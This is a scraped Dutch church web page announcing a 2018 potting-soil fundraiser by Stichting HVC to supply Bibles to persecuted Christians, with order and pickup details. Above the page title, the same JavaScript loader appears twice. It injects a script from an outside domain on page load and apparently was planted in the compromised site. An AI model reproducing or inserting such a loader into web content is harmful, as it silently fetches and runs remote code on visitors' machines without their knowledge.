;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Potgrondactie Plant een Bijbel 2018 – Bijbels voor vervolgde christenen - PKN Damwâld

Potgrondactie Plant een Bijbel 2018 – Bijbels voor vervolgde christenen

Gepubliceerd op: maandag 22 januari 2018

Stichting Hulp Vervolgde Christenen (HVC) organiseert ook dit jaar de potgrondactie Plant een Bijbel. Hiermee wil HVC christenen in vervolging en armoede een eigen Bijbel geven. Het is voor hen een bezit van onschatbare waarde! Er is toenemende vraag naar Bijbels om te verspreiden onder anders gelovigen, zoals hindoes en moslims. Ook zij hebben het Evangelie dringend nodig. Door mee te doen aan de potgrondactie helpt u Gods Woord te planten in Pakistan, Nepal, India, Irak en Oeganda.
Voor elke twee zakken potgrond die worden verkocht, verspreidt HVC een Bijbel in één van de bovenstaande landen. U kunt t/m 24 februari potgrond bestellen via www.planteenbijbel.nl. Ook kunt u het bestelformulier inleveren in de daarvoor bestemde bak in de hal van  de Ontmoeting, Foarwei 48 Damwâld of bij één van de diakenen. Op zaterdag 10 maart kunt u de potgrond tussen 10.00 en 16.00 ophalen bij de Fam. Meinema, Thiedamawei 15, Damwâld. Geen potgrond nodig, maar wel een Bijbel geven? Doneren kan ook via www.planteenbijbel.nl.